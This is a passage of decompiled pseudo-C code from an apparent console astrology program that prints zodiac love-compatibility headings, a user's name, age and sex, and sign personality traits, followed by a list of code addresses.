																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a4, __ebx);
																				_push("LEO AND SCORPIO LOVE COMPATIBILITY");
																				 *0x13fe250 = 0x80005;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__edx = 0x2d;
																				__eax = E013D1B90(__ebx, 0x2d, __edi);
																				__ecx = _a4;
																				_push(_a4);
																				_push(__edi);
																				_push(__ebx);
																				_push(__esi);
																				L97();
																				__esp = 0x20 + __esp;
																				goto L126;
																			case 0xe:
																				L121:
																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D17E0();
																				__edx = _a4;
																				__edx = __edi;
																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a4, __ebx);
																				_push("LEO AND SAGGITARIUS LOVE COMPATIBILITY");
																				 *0x13fe250 = 0x80005;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__edx = 0x2e;
																				__eax = E013D1B90(__ebx, 0x2e, __edi);
																				__edx = _a4;
																				_push(__edx);
																				_push(__edi);
																				_push(__ebx);
																				_push(__esi);
																				L97();
																				__esp = 0x20 + __esp;
																				goto L126;
																			case 0xf:
																				L122:
																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D17E0();
																				__eax = _a4;
																				__edx = __edi;
																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a4, __ebx);
																				_push("LEO AND CAPRICORN LOVE COMPATIBILITY");
																				 *0x13fe250 = 0x80005;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__edx = 0x2f;
																				E013D1B90(__ebx, 0x2f, __edi) = _a4;
																				_push(_a4);
																				_push(__edi);
																				_push(__ebx);
																				_push(__esi);
																				L97();
																				__esp = 0x20 + __esp;
																				goto L126;
																			case 0x10:
																				L123:
																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D17E0();
																				__ecx = _a4;
																				__edx = __edi;
																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a4, __ebx);
																				_push("LEO AND AQUARIUS LOVE COMPATIBILITY");
																				 *0x13fe250 = 0x80005;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__edx = 0x30;
																				__eax = E013D1B90(__ebx, 0x30, __edi);
																				__ecx = _a4;
																				_push(_a4);
																				_push(__edi);
																				_push(__ebx);
																				_push(__esi);
																				L97();
																				__esp = 0x20 + __esp;
																				goto L126;
																			case 0x11:
																				L124:
																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D17E0();
																				__edx = _a4;
																				__edx = __edi;
																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a4, __ebx);
																				_push("LEO AND PISCES LOVE COMPATIBILITY");
																				 *0x13fe250 = 0x80005;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__edx = 0x31;
																				__eax = E013D1B90(__ebx, 0x31, __edi);
																				__edx = _a4;
																				_push(__edx);
																				_push(__edi);
																				_push(__ebx);
																				_push(__esi);
																				L97();
																				__esp = 0x20 + __esp;
																				goto L126;
																		}
																		L126:
																		__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																		_push(__edi);
																		_push("Name: %s");
																		 *0x13fe250 = 0x30037;
																		__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																		__ecx = _v32;
																		_push(_v32);
																		_push("Age=%d");
																		 *0x13fe250 = 0x40037;
																		__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																		__ecx = _v36;
																		 *0x13fe250 = 0x50037;
																		_push(E013DC111(_v36));
																		_push("Sex=%c");
																		__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																		__esp = 0x20 + __esp;
																		__eax = E013D17E0();
																		_v44 = "\n*  You always aim to get above the common herd of humanity.";
																		_v40 = "\n*  You are usually very patient and long-suffering, but if once roused, you know no fear.";
																		__eax = E013D1C60(__ebx, __ecx, __edi, __esi, __eflags);
																		__eax = __eax - 1;
																		__eflags = __eax - 5;
																	} while (__eflags <= 0);
																	_pop(__esi);
																	goto L128;
																}
																goto L500;
															case 6:
																L80:
																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1760();
																__ecx = _a8;
																__edx = __esi;
																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a8, __ebx);
																_push("CANCER AND ARIES LOVE COMPATIBILITY");
																 *0x13fe250 = 0x80005;
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__edx = 3;
																__eax = E013D1B90(__ebx, 3, __edi);
																__ecx = _a8;
																_push(_a8);
																_push(__esi);
																_push(__ebx);
																_push(__edi);
																L64();
																__esp = 0x20 + __esp;
																goto L93;
															case 7:
																L81:
																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1760();
																__edx = _a8;
																__edx = __esi;
																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a8, __ebx);
																_push("CANCER AND TAURUS LOVE COMPATIBILITY");
																 *0x13fe250 = 0x80005;
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__edx = 0xe;
																__eax = E013D1B90(__ebx, 0xe, __edi);
																__edx = _a8;
																_push(__edx);
																_push(__esi);
																_push(__ebx);
																_push(__edi);
																L64();
																__esp = 0x20 + __esp;
																goto L93;
															case 8:
																L82:
																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1760();
																__eax = _a8;
																__edx = __esi;
																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a8, __ebx);
																_push("CANCER AND GEMINI LOVE COMPATIBILITY");
																 *0x13fe250 = 0x80005;
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__edx = 0x18;
																E013D1B90(__ebx, 0x18, __edi) = _a8;
																_push(_a8);
																_push(__esi);
																_push(__ebx);
																_push(__edi);
																L64();
																__esp = 0x20 + __esp;
																goto L93;
															case 9:
																L83:
																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1760();
																__ecx = _a8;
																__edx = __esi;
																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a8, __ebx);
																_push("CANCER AND CANCER LOVE COMPATIBILITY");
																 *0x13fe250 = 0x80005;
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__edx = 0x21;
																__eax = E013D1B90(__ebx, 0x21, __edi);
																__ecx = _a8;
																_push(_a8);
																_push(__esi);
																_push(__ebx);
																_push(__edi);
																L64();
																__esp = 0x20 + __esp;
																goto L93;
															case 0xa:
																L84:
																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1760();
																__edx = _a8;
																__edx = __esi;
																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a8, __ebx);
																_push("CANCER AND LEO LOVE COMPATIBILITY");
																 *0x13fe250 = 0x80005;
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__edx = 0x22;
																__eax = E013D1B90(__ebx, 0x22, __edi);
																__edx = _a8;
																_push(__edx);
																_push(__esi);
																_push(__ebx);
																_push(__edi);
																L64();
																__esp = 0x20 + __esp;
																goto L93;
															case 0xb:
																L85:
																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1760();
																__eax = _a8;
																__edx = __esi;
																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a8, __ebx);
																_push("CANCER AND VIRGO LOVE COMPATIBILITY");
																 *0x13fe250 = 0x80005;
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__edx = 0x23;
																E013D1B90(__ebx, 0x23, __edi) = _a8;
																_push(_a8);
																_push(__esi);
																_push(__ebx);
																_push(__edi);
																L64();
																__esp = 0x20 + __esp;
																goto L93;
															case 0xc:
																L86:
																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1760();
																__ecx = _a8;
																__edx = __esi;
																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a8, __ebx);
																_push("CANCER AND LIBRA LOVE COMPATIBILITY");
																 *0x13fe250 = 0x80005;
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__edx = 0x24;
																__eax = E013D1B90(__ebx, 0x24, __edi);
																__ecx = _a8;
																_push(_a8);
																_push(__esi);
																_push(__ebx);
																_push(__edi);
																L64();
																__esp = 0x20 + __esp;
																goto L93;
															case 0xd:
																L87:
																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1760();
																__edx = _a8;
																__edx = __esi;
																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a8, __ebx);
																_push("CANCER AND SCORPIO LOVE COMPATIBILITY");
																 *0x13fe250 = 0x80005;
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__edx = 0x25;
																__eax = E013D1B90(__ebx, 0x25, __edi);
																__edx = _a8;
																_push(__edx);
																_push(__esi);
																_push(__ebx);
																_push(__edi);
																L64();
																__esp = 0x20 + __esp;
																goto L93;
															case 0xe:
																L88:
																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1760();
																__eax = _a8;
																__edx = __esi;
																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a8, __ebx);
																_push("CANCER AND SAGGITARIUS LOVE COMPATIBILITY");
																 *0x13fe250 = 0x80005;
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__edx = 0x26;
																E013D1B90(__ebx, 0x26, __edi) = _a8;
																_push(_a8);
																_push(__esi);
																_push(__ebx);
																_push(__edi);
																L64();
																__esp = 0x20 + __esp;
																goto L93;
															case 0xf:
																L89:
																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1760();
																__ecx = _a8;
																__edx = __esi;
																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a8, __ebx);
																_push("CANCER AND CAPRICORN LOVE COMPATIBILITY");
																 *0x13fe250 = 0x80005;
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__edx = 0x27;
																__eax = E013D1B90(__ebx, 0x27, __edi);
																__ecx = _a8;
																_push(_a8);
																_push(__esi);
																_push(__ebx);
																_push(__edi);
																L64();
																__esp = 0x20 + __esp;
																goto L93;
															case 0x10:
																L90:
																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1760();
																__edx = _a8;
																__edx = __esi;
																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a8, __ebx);
																_push("CANCER AND AQUARIUS LOVE COMPATIBILITY");
																 *0x13fe250 = 0x80005;
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__edx = 0x28;
																__eax = E013D1B90(__ebx, 0x28, __edi);
																__edx = _a8;
																_push(__edx);
																_push(__esi);
																_push(__ebx);
																_push(__edi);
																L64();
																__esp = 0x20 + __esp;
																goto L93;
															case 0x11:
																L91:
																E013DB418(__ebx, __edx, __eflags, "cls") = E013D1760();
																__eax = _a8;
																__edx = __esi;
																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a8, __ebx);
																_push("CANCER AND PISCES LOVE COMPATIBILITY");
																 *0x13fe250 = 0x80005;
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__edx = 0x29;
																E013D1B90(__ebx, 0x29, __edi) = _a8;
																_push(_a8);
																_push(__esi);
																_push(__ebx);
																_push(__edi);
																L64();
																__esp = 0x20 + __esp;
																goto L93;
														}
														L93:
														__eax = E013DB418(__ebx, __edx, __eflags, "cls");
														_push(__esi);
														_push("Name: %s");
														 *0x13fe250 = 0x30037;
														__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
														__edx = _v28;
														_push(__edx);
														_push("Age=%d");
														 *0x13fe250 = 0x40037;
														__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
														__edx = _v32;
														 *0x13fe250 = 0x50037;
														_push(E013DC111(__edx));
														_push("Sex=%c");
														__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
														__esp = 0x20 + __esp;
														__eax = E013D1760();
														_v40 = "\n*  You are easily hurt by the slights of others.";
														_v36 = "\n*  In your home life you usually go through a great deal of trouble.";
														__eax = E013D1C60(__ebx, __ecx, __edi, __esi, __eflags);
														__eax = __eax - 1;
														__eflags = __eax - 5;
													} while (__eflags <= 0);
													_pop(__edi);
													goto L95;
												}
												goto L500;
											case 6:
												L47:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D16D0();
												__edx = __esi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
												_push("GEMINI AND ARIES LOVE COMPATIBILITY");
												 *0x13fe250 = 0xa0005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 2;
												__eax = E013D1B90(__ebx, 2, __edi);
												__edx = _v0;
												_push(__ebx);
												_push(__esi);
												_push(__edi);
												_push(__edx);
												L31();
												__esp = 0x20 + __esp;
												goto L60;
											case 7:
												L48:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D16D0();
												__edx = __esi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
												_push("GEMINI AND TAURUS LOVE COMPATIBILITY");
												 *0x13fe250 = 0xa0005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0xd;
												__eax = E013D1B90(__ebx, 0xd, __edi);
												__edx = _v0;
												_push(__ebx);
												_push(__esi);
												_push(__edi);
												_push(__edx);
												L31();
												__esp = 0x20 + __esp;
												goto L60;
											case 8:
												L49:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D16D0();
												__edx = __esi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
												_push("GEMINI AND GEMINI LOVE COMPATIBILITY");
												 *0x13fe250 = 0xa0005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0x17;
												__eax = E013D1B90(__ebx, 0x17, __edi);
												__edx = _v0;
												_push(__ebx);
												_push(__esi);
												_push(__edi);
												_push(__edx);
												L31();
												__esp = 0x20 + __esp;
												goto L60;
											case 9:
												L50:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D16D0();
												__edx = __esi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
												_push("GEMINI AND CANCER LOVE COMPATIBILITY");
												 *0x13fe250 = 0xa0005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0x18;
												__eax = E013D1B90(__ebx, 0x18, __edi);
												__edx = _v0;
												_push(__ebx);
												_push(__esi);
												_push(__edi);
												_push(__edx);
												L31();
												__esp = 0x20 + __esp;
												goto L60;
											case 0xa:
												L51:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D16D0();
												__edx = __esi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
												_push("GEMINI AND LEO LOVE COMPATIBILITY");
												 *0x13fe250 = 0xa0005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0x19;
												__eax = E013D1B90(__ebx, 0x19, __edi);
												__edx = _v0;
												_push(__ebx);
												_push(__esi);
												_push(__edi);
												_push(__edx);
												L31();
												__esp = 0x20 + __esp;
												goto L60;
											case 0xb:
												L52:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D16D0();
												__edx = __esi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
												_push("GEMINI AND VIRGO LOVE COMPATIBILITY");
												 *0x13fe250 = 0xa0005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0x1a;
												__eax = E013D1B90(__ebx, 0x1a, __edi);
												__edx = _v0;
												_push(__ebx);
												_push(__esi);
												_push(__edi);
												_push(__edx);
												L31();
												__esp = 0x20 + __esp;
												goto L60;
											case 0xc:
												L53:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D16D0();
												__edx = __esi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
												_push("GEMINI AND LIBRA LOVE COMPATIBILITY");
												 *0x13fe250 = 0xa0005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0x1b;
												__eax = E013D1B90(__ebx, 0x1b, __edi);
												__edx = _v0;
												_push(__ebx);
												_push(__esi);
												_push(__edi);
												_push(__edx);
												L31();
												__esp = 0x20 + __esp;
												goto L60;
											case 0xd:
												L54:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D16D0();
												__edx = __esi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
												_push("GEMINI AND SCORPIO LOVE COMPATIBILITY");
												 *0x13fe250 = 0xa0005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0x1c;
												__eax = E013D1B90(__ebx, 0x1c, __edi);
												__edx = _v0;
												_push(__ebx);
												_push(__esi);
												_push(__edi);
												_push(__edx);
												L31();
												__esp = 0x20 + __esp;
												goto L60;
											case 0xe:
												L55:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D16D0();
												__edx = __esi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
												_push("GEMINI AND SAGGITARIUS LOVE COMPATIBILITY");
												 *0x13fe250 = 0xa0005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0x1d;
												__eax = E013D1B90(__ebx, 0x1d, __edi);
												__edx = _v0;
												_push(__ebx);
												_push(__esi);
												_push(__edi);
												_push(__edx);
												L31();
												__esp = 0x20 + __esp;
												goto L60;
											case 0xf:
												L56:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D16D0();
												__edx = __esi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
												_push("GEMINI AND CAPRICORN LOVE COMPATIBILITY");
												 *0x13fe250 = 0xa0005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0x1e;
												__eax = E013D1B90(__ebx, 0x1e, __edi);
												__edx = _v0;
												_push(__ebx);
												_push(__esi);
												_push(__edi);
												_push(__edx);
												L31();
												__esp = 0x20 + __esp;
												goto L60;
											case 0x10:
												L57:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D16D0();
												__edx = __esi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
												_push("GEMINI AND AQUARIUS LOVE COMPATIBILITY");
												 *0x13fe250 = 0xa0005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0x1f;
												__eax = E013D1B90(__ebx, 0x1f, __edi);
												__edx = _v0;
												_push(__ebx);
												_push(__esi);
												_push(__edi);
												_push(__edx);
												L31();
												__esp = 0x20 + __esp;
												goto L60;
											case 0x11:
												L58:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D16D0();
												__edx = __esi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
												_push("GEMINI AND PISCES LOVE COMPATIBILITY");
												 *0x13fe250 = 0xa0005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0x20;
												__eax = E013D1B90(__ebx, 0x20, __edi);
												__edx = _v0;
												_push(__ebx);
												_push(__esi);
												_push(__edi);
												_push(__edx);
												L31();
												__esp = 0x20 + __esp;
												goto L60;
										}
										L60:
										__eax = E013DB418(__ebx, __edx, __eflags, "cls");
										_push(__esi);
										_push("Name: %s");
										 *0x13fe250 = 0x30037;
										__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
										__ecx = _v20;
										_push(_v20);
										_push("Age=%d");
										 *0x13fe250 = 0x40037;
										E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = __bl;
										 *0x13fe250 = 0x50037;
										_push(E013DC111(__bl));
										_push("Sex=%c");
										__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
										__esp = 0x20 + __esp;
										__eax = E013D16D0();
										_v32 = "\n*  You are widely known for your dual personalities and ability to change mood from moment to moment.";
										_v28 = "\n*  Although you hate to be tied down, you make lively, entertaining and romantic partners, even if you can be rather fickle if bored or unhappy.";
										_v24 = "\n*  The twin sides of your nature are perpetually pulling in opposite directions.";
										__eax = E013D1C60(__ebx, __ecx, __edi, __esi, __eflags);
										__eax = __eax - 1;
										__eflags = __eax - 5;
									} while (__eflags <= 0);
									goto L61;
								}
								goto L500;
							case 6:
								L15:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1640();
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
								_push("TAURUS AND ARIES LOVE COMPATIBILITY");
								 *0x13fe250 = 0xa0005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__esp = 0xc + __esp;
								__edx = 1;
								E013D1B90(__ebx, 1, __edi) = _a4;
								__eax = E013D2E50(__ebx, __ecx, __edi, __esi, __eflags, _a4, __edi, __esi, __ebx);
								__esp = 0x10 + __esp;
								goto L28;
							case 7:
								L16:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1640();
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
								_push("TAURUS AND TAURUS LOVE COMPATIBILITY");
								 *0x13fe250 = 0xa0005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__esp = 0xc + __esp;
								__edx = 0xc;
								E013D1B90(__ebx, 0xc, __edi) = _a4;
								__eax = E013D2E50(__ebx, __ecx, __edi, __esi, __eflags, _a4, __edi, __esi, __ebx);
								__esp = 0x10 + __esp;
								goto L28;
							case 8:
								L17:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1640();
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
								_push("TAURUS AND GEMINI LOVE COMPATIBILITY");
								 *0x13fe250 = 0xa0005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__esp = 0xc + __esp;
								__edx = 0xd;
								E013D1B90(__ebx, 0xd, __edi) = _a4;
								__eax = E013D2E50(__ebx, __ecx, __edi, __esi, __eflags, _a4, __edi, __esi, __ebx);
								__esp = 0x10 + __esp;
								goto L28;
							case 9:
								L18:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1640();
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
								_push("TAURUS AND CANCER LOVE COMPATIBILITY");
								 *0x13fe250 = 0xa0005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__esp = 0xc + __esp;
								__edx = 0xe;
								E013D1B90(__ebx, 0xe, __edi) = _a4;
								__eax = E013D2E50(__ebx, __ecx, __edi, __esi, __eflags, _a4, __edi, __esi, __ebx);
								__esp = 0x10 + __esp;
								goto L28;
							case 0xa:
								L19:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1640();
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
								_push("TAURUS AND LEO LOVE COMPATIBILITY");
								 *0x13fe250 = 0xa0005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__esp = 0xc + __esp;
								__edx = 0xf;
								E013D1B90(__ebx, 0xf, __edi) = _a4;
								__eax = E013D2E50(__ebx, __ecx, __edi, __esi, __eflags, _a4, __edi, __esi, __ebx);
								__esp = 0x10 + __esp;
								goto L28;
							case 0xb:
								L20:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1640();
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
								_push("TAURUS AND VIRGO LOVE COMPATIBILITY");
								 *0x13fe250 = 0xa0005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__esp = 0xc + __esp;
								__edx = 0x10;
								E013D1B90(__ebx, 0x10, __edi) = _a4;
								__eax = E013D2E50(__ebx, __ecx, __edi, __esi, __eflags, _a4, __edi, __esi, __ebx);
								__esp = 0x10 + __esp;
								goto L28;
							case 0xc:
								L21:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1640();
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
								_push("TAURUS AND LIBRA LOVE COMPATIBILITY");
								 *0x13fe250 = 0xa0005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__esp = 0xc + __esp;
								__edx = 0x11;
								E013D1B90(__ebx, 0x11, __edi) = _a4;
								__eax = E013D2E50(__ebx, __ecx, __edi, __esi, __eflags, _a4, __edi, __esi, __ebx);
								__esp = 0x10 + __esp;
								goto L28;
							case 0xd:
								L22:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1640();
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
								_push("TAURUS AND SCORPIO LOVE COMPATIBILITY");
								 *0x13fe250 = 0xa0005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__esp = 0xc + __esp;
								__edx = 0x12;
								E013D1B90(__ebx, 0x12, __edi) = _a4;
								__eax = E013D2E50(__ebx, __ecx, __edi, __esi, __eflags, _a4, __edi, __esi, __ebx);
								__esp = 0x10 + __esp;
								goto L28;
							case 0xe:
								L23:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1640();
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
								_push("TAURUS AND SAGGITARIUS LOVE COMPATIBILITY");
								 *0x13fe250 = 0xa0005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__esp = 0xc + __esp;
								__edx = 0x13;
								E013D1B90(__ebx, 0x13, __edi) = _a4;
								__eax = E013D2E50(__ebx, __ecx, __edi, __esi, __eflags, _a4, __edi, __esi, __ebx);
								__esp = 0x10 + __esp;
								goto L28;
							case 0xf:
								L24:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1640();
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
								_push("TAURUS AND CAPRICORN LOVE COMPATIBILITY");
								 *0x13fe250 = 0xa0005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__esp = 0xc + __esp;
								__edx = 0x14;
								E013D1B90(__ebx, 0x14, __edi) = _a4;
								__eax = E013D2E50(__ebx, __ecx, __edi, __esi, __eflags, _a4, __edi, __esi, __ebx);
								__esp = 0x10 + __esp;
								goto L28;
							case 0x10:
								L25:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1640();
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
								_push("TAURUS AND AQUARIUS LOVE COMPATIBILITY");
								 *0x13fe250 = 0xa0005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__esp = 0xc + __esp;
								__edx = 0x15;
								E013D1B90(__ebx, 0x15, __edi) = _a4;
								__eax = E013D2E50(__ebx, __ecx, __edi, __esi, __eflags, _a4, __edi, __esi, __ebx);
								__esp = 0x10 + __esp;
								goto L28;
							case 0x11:
								L26:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1640();
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
								_push("TAURUS AND PISCES LOVE COMPATIBILITY");
								 *0x13fe250 = 0xa0005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__esp = 0xc + __esp;
								__edx = 0x16;
								E013D1B90(__ebx, 0x16, __edi) = _a4;
								__eax = E013D2E50(__ebx, __ecx, __edi, __esi, __eflags, _a4, __edi, __esi, __ebx);
								__esp = 0x10 + __esp;
								goto L28;
						}
						L28:
						E013DB418(_t1085, _t1093, _t1121, "cls");
						_push(_t1101);
						_push("Name: %s");
						 *0x13fe250 = 0x30037;
						E013DB9F5(_t1085, _t1093, _t1098, _t1101, _t1121);
						_t1092 = _v28;
						_push(_v28);
						_push("Age=%d");
						 *0x13fe250 = 0x40037;
						E013DB9F5(_t1085, _v28, _t1098, _t1101, _t1121);
						 *0x13fe250 = 0x50037;
						_push(E013DC111(_t1085));
						_push("Sex=%c");
						E013DB9F5(_t1085, _v28, _t1098, _t1101, _t1121);
						_t1108 = _t1112 + 0x20;
						E013D1640();
						_v24 = "\n*  You tend to be very patient, practical and dedicated.";
						_v20 = "\n*  You are usually very cautious when dealing with people, life and money.";
						_v16 = "\n*  You have a curious power of dominating others, even when not conscious of trying to do so.";
						_v12 = "\n*  If you are in love, you are generous to the last degree, and will consider no sacrifice too great for the person you care for.";
						_v8 = "\n*  If you are enemy, you will fight with the most determined obstinacy.";
						_t1051 = E013D1C60(_t1085, _t1088, _t1098, _t1101, _t1121) - 1;
					} while (_t1051 <= 5);
					goto L29;
				}
				L500:
			}


















































































                                                                          0x013d2e50
                                                                          0x013d2e50
                                                                          0x013d2e59
                                                                          0x013d2e5a
                                                                          0x013d2e5b
                                                                          0x013d2e61
                                                                          0x013d2e66
                                                                          0x013d2e6c
                                                                          0x013d2e6d
                                                                          0x013d2e72
                                                                          0x013d2e7c
                                                                          0x013d2e81
                                                                          0x013d2e8b
                                                                          0x013d2e8c
                                                                          0x013d2e91
                                                                          0x013d2e9b
                                                                          0x013d2e9f
                                                                          0x013d2ea4
                                                                          0x013d2eab
                                                                          0x013d2ebd
                                                                          0x013d2ebe
                                                                          0x013d2ec3
